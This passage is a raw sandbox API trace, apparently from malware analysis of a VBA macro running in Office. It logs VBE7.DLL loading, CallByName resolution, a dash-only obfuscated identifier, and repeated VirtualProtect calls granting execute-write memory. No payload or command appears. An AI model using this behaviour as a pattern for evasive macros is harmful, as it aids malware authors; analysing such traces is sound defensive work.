(_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0103.706] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0103.706] SetErrorMode (uMode=0x8001) returned 0x8001 [0103.707] GetProcAddress (hModule=0x681f0000, lpProcName=0x2c9) returned 0x683ffe55 [0103.708] GetAsyncKeyState (vKey=3) returned 0 [0103.802] GetAsyncKeyState (vKey=3) returned 0 [0103.802] CRetailMalloc_Alloc () returned 0xcac6d30 [0103.802] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.802] memcpy (in: _Dst=0xaf5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.802] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.803] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2dad8c, cbMultiByte=10, lpWideCharStr=0x9eb058c, cchWideChar=22 | out: lpWideCharStr="NFPuVe270q") returned 10 [0103.803] memcpy (in: _Dst=0x88f1f90, _Src=0x9eb0588, _Size=0x1a | out: _Dst=0x88f1f90) returned 0x88f1f90 [0103.803] memcpy (in: _Dst=0xaf516c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.803] memcpy (in: _Dst=0xaf516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52d36, cbMultiByte=6, lpWideCharStr=0x1976c4, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0103.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32e6e, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0103.804] memcpy (in: _Dst=0xf5d26a8, _Src=0xcbc97d8, _Size=0x4 | out: _Dst=0xf5d26a8) returned 0xf5d26a8 [0103.804] memcpy (in: _Dst=0xaf5170, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0103.804] memcpy (in: _Dst=0xaf5174, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0103.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52d5a, cbMultiByte=11, lpWideCharStr=0x1976c4, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0103.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32e02, cbMultiByte=11, lpWideCharStr=0x197724, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0103.806] memcpy (in: _Dst=0x1976ec, _Src=0x197760, _Size=0x8 | out: _Dst=0x1976ec) returned 0x1976ec [0103.806] memcpy (in: _Dst=0xcace738, _Src=0x1976ec, _Size=0x8 | out: _Dst=0xcace738) returned 0xcace738 [0103.806] CRetailMalloc_Alloc () returned 0xc823338 [0103.806] CRetailMalloc_Free () returned 0x1 [0103.806] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52d82, cbMultiByte=31, lpWideCharStr=0x1976c4, cchWideChar=32 | out: lpWideCharStr="———–––————–—––—————————–——–––—") returned 31 [0103.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10996, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="———–––————–—––—————————–——–––—") returned 31 [0103.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10996, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="———–––————–—––—————————–——–––—") returned 31 [0103.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10996, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="———–––————–—––—————————–——–––—") returned 31 [0103.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10996, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="———–––————–—––—————————–——–––—") returned 31 [0103.865] CRetailMalloc_Alloc () returned 0xc846070 [0103.866] _mbscpy_s (in: _Dst=0xc846070, _DstSizeInBytes=0x1f, _Src=0x9d10996 | out: _Dst=0xc846070) returned 0x0 [0103.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10a96, cbMultiByte=38, lpWideCharStr=0x197734, cchWideChar=39 | out: lpWideCharStr="_B_var_———–––————–—––—————————–——–––—") returned 38 [0103.866] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1f, _Src=0x9d10996 | out: _Dst=0x19779c) returned 0x0 [0103.866] CRetailMalloc_Free () returned 0x1 [0103.866] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.866] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.866] memcpy (in: _Dst=0xaf516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.867] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.867] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.867] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.867] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0103.868] memcpy (in: _Dst=0xcac6e1c, _Src=0x197944, _Size=0x18 | out: _Dst=0xcac6e1c) returned 0xcac6e1c [0103.868] CRetailMalloc_Realloc () returned 0xcac6d30 [0103.868] CRetailMalloc_Free () returned 0x1 [0103.868] GetCurrentProcess () returned 0xffffffff [0103.868] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0103.868] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.869] GetCurrentProcess () returned 0xffffffff [0103.869] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0103.869] GetCurrentProcess () returned 0xffffffff [0103.869] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0103.869] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.869] GetCurrentProcess () returned 0xffffffff [0103.869] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0103.869] GetCurrentProcess () returned 0xffffffff [0103.869] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0103.870] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.871] GetCurrentProcess () returned 0xffffffff [0103.871] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0103.871] GetCurrentProcess () returned 0xffffffff [0103.871] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0103.871] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.872] GetCurrentProcess () returned 0xffffffff [0103.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0103.872] GetCurrentProcess () returned 0xffffffff [0103.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0103.872] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.872] GetCurrentProcess () returned 0xffffffff [0103.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0103.872] GetCurrentProcess () returned 0xffffffff [0103.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0103.873] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.873] GetCurrentProcess () returned 0xffffffff [0103.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0103.873] GetCurrentProcess () returned 0xffffffff [0103.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0103.873] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.873] GetCurrentProcess () returned 0xffffffff [0103.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0103.873] GetCurrentProcess () returned 0xffffffff [0103.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0103.874] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.874] GetCurrentProcess () returned 0xffffffff [0103.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0103.874] GetCurrentProcess () returned 0xffffffff [0103.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0103.874] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.874] GetCurrentProcess () returned 0xffffffff [0103.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0103.874] GetCurrentProcess () returned 0xffffffff [0103.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0103.875] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.875] GetCurrentProcess () returned 0xffffffff [0103.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0103.875] GetCurrentProcess () returned 0xffffffff [0103.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0103.875] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.875] GetCurrentProcess () returned 0xffffffff [0103.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0103.875] GetCurrentProcess () returned 0xffffffff [0103.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0103.876] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.876] GetCurrentProcess () returned 0xffffffff [0103.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0103.876] GetCurrentProcess () returned 0xffffffff [0103.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0103.876] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.876] GetCurrentProcess () returned 0xffffffff [0103.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0103.876] GetCurrentProcess () returned 0xffffffff [0103.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0103.877] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.877] GetCurrentProcess () returned 0xffffffff [0103.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0103.877] GetCurrentProcess () returned 0xffffffff [0103.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0103.877] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.877] GetCurrentProcess () returned 0xffffffff [0103.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0103.877] GetCurrentProcess () returned 0xffffffff [0103.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0103.877] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.878] GetCurrentProcess () returned 0xffffffff [0103.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0103.878] GetCurrentProcess () returned 0xffffffff [0103.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0103.878] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.878] GetCurrentProcess () returned 0xffffffff [0103.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0103.878] GetCurrentProcess () returned 0xffffffff [0103.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0103.878] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.879] GetCurrentProcess () returned 0xffffffff [0103.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0103.879] GetCurrentProcess () returned 0xffffffff [0103.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0103.879] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.879] GetCurrentProcess () returned 0xffffffff [0103.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0103.879] GetCurrentProcess () returned 0xffffffff [0103.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0103.879] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.880] GetCurrentProcess () returned 0xffffffff [0103.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0103.880] GetCurrentProcess () returned 0xffffffff [0103.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0103.880] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.880] GetCurrentProcess () returned 0xffffffff [0103.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0103.880] GetCurrentProcess () returned 0xffffffff [0103.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0103.880] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.881] GetCurrentProcess () returned 0xffffffff [0103.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0103.881] GetCurrentProcess () returned 0xffffffff [0103.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0103.881] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.881] GetCurrentProcess () returned 0xffffffff [0103.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0103.881] GetCurrentProcess () returned 0xffffffff [0103.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0103.881] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.882] GetCurrentProcess () returned 0xffffffff [0103.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0103.882] GetCurrentProcess () returned 0xffffffff [0103.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0103.882] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.882] GetCurrentProcess () returned 0xffffffff [0103.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0103.882] GetCurrentProcess () returned 0xffffffff [0103.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0103.882] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.883] GetCurrentProcess () returned 0xffffffff [0103.883] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0103.883] GetCurrentProcess () returned 0xffffffff [0103.883] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0103.883] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.883] GetCurrentProcess () returned 0xffffffff [0103.883] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0103.883] GetCurrentProcess () returned 0xffffffff [0103.883] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0103.883] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.884] GetCurrentProcess () returned 0xffffffff [0103.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0103.884] GetCurrentProcess () returned 0xffffffff [0103.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0103.884] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.884] GetCurrentProcess () returned 0xffffffff [0103.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0103.884] GetCurrentProcess () returned 0xffffffff [0103.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0103.884] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.885] GetCurrentProcess () returned 0xffffffff [0103.885] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0103.885] GetCurrentProcess () returned 0xffffffff [0103.885] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0103.885] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0103.885] GetCurrentProcess () returned 0xffffffff [0103.886] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0103.886] SetErrorMode (uMode=0x8001) returned 0x8001 [0103.886] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0103.886] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0103.886] SetErrorMode (uMode=0x8001) returned 0x8001 [0103.887] GetProcAddress (hModule=0x681f0000, lpProcName=0x2cb) returned 0x683c04b4 [0103.888] GetAsyncKeyState (vKey=3) returned 0 [0103.888] CRetailMalloc_Alloc () returned 0xcac6e88 [0103.888] memcpy (in: _Dst=0xaf5168, _Src=0x19779c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.888] memcpy (in: _Dst=0xcac6ea8, _Src=0x197804, _Size=0x18 | out: _Dst=0xcac6ea8) returned 0xcac6ea8 [0103.888] CRetailMalloc_Realloc () returned 0xcac6e88 [0103.888] CRetailMalloc_Free () returned 0x1 [0103.889] GetCurrentProcess () returned 0xffffffff [0103.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0103.889] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.889] GetCurrentProcess () returned 0xffffffff [0103.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0103.889] GetCurrentProcess () returned 0xffffffff [0103.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0103.889] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.890] GetCurrentProcess () returned 0xffffffff [0103.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0103.890] GetCurrentProcess () returned 0xffffffff [0103.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0103.890] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.890] GetCurrentProcess () returned 0xffffffff [0103.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0103.890] GetCurrentProcess () returned 0xffffffff [0103.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0103.891] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.891] GetCurrentProcess () returned 0xffffffff [0103.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0103.891] GetCurrentProcess () returned 0xffffffff [0103.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0103.891] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.891] GetCurrentProcess () returned 0xffffffff [0103.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0103.891] GetCurrentProcess () returned 0xffffffff [0103.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0103.891] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.892] GetCurrentProcess () returned 0xffffffff [0103.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0103.892] GetCurrentProcess () returned 0xffffffff [0103.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0103.892] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.893] GetCurrentProcess () returned 0xffffffff [0103.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0103.893] GetCurrentProcess () returned 0xffffffff [0103.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0103.893] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.893] GetCurrentProcess () returned 0xffffffff [0103.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0103.893] GetCurrentProcess () returned 0xffffffff [0103.893] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0103.893] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.894] GetCurrentProcess () returned 0xffffffff [0103.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0103.894] GetCurrentProcess () returned 0xffffffff [0103.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0103.894] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.894] GetCurrentProcess () returned 0xffffffff [0103.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0103.894] GetCurrentProcess () returned 0xffffffff [0103.894] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0103.894] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0103.895] 